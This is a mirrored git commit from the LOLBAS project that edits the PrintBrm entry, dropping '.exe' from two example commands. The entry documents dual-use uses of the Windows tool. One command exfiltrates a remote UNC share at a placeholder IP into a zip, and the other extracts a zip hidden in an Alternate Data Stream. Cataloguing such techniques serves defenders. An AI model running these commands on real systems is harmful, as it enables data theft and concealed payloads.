mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2024-12-26 14:59:03 +01:00
Remove .exe from command
This commit is contained in:
parent
63af8cca3b
commit
34af96f564
@ -4,7 +4,7 @@ Description: Printer Migration Command-Line Tool
|
|||||||
Author: 'Elliot Killick'
|
Author: 'Elliot Killick'
|
||||||
Created: '2021-06-21'
|
Created: '2021-06-21'
|
||||||
Commands:
|
Commands:
|
||||||
- Command: PrintBrm.exe -b -d \\1.2.3.4\share\example_folder -f C:\Users\user\Desktop\new.zip
|
- Command: PrintBrm -b -d \\1.2.3.4\share\example_folder -f C:\Users\user\Desktop\new.zip
|
||||||
Description: Create a ZIP file from a folder in a remote drive
|
Description: Create a ZIP file from a folder in a remote drive
|
||||||
Usecase: Exfiltrate the contents of a remote folder on a UNC share into a zip file
|
Usecase: Exfiltrate the contents of a remote folder on a UNC share into a zip file
|
||||||
Category: Download
|
Category: Download
|
||||||
@ -12,7 +12,7 @@ Commands:
|
|||||||
MitreID: T1105
|
MitreID: T1105
|
||||||
MitreLink: https://attack.mitre.org/techniques/T1105/
|
MitreLink: https://attack.mitre.org/techniques/T1105/
|
||||||
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: PrintBrm.exe -r -f C:\Users\user\Desktop\data.txt:hidden.zip -d C:\Users\user\Desktop\new_folder
|
- Command: PrintBrm -r -f C:\Users\user\Desktop\data.txt:hidden.zip -d C:\Users\user\Desktop\new_folder
|
||||||
Description: Extract the contents of a ZIP file stored in an Alternate Data Stream (ADS) and store it in a folder
|
Description: Extract the contents of a ZIP file stored in an Alternate Data Stream (ADS) and store it in a folder
|
||||||
Usecase: Decompress and extract a ZIP file stored on an alternate data stream to a new folder
|
Usecase: Decompress and extract a ZIP file stored on an alternate data stream to a new folder
|
||||||
Category: ADS
|
Category: ADS
|
||||||
|
Loading…
Reference in New Issue
Block a user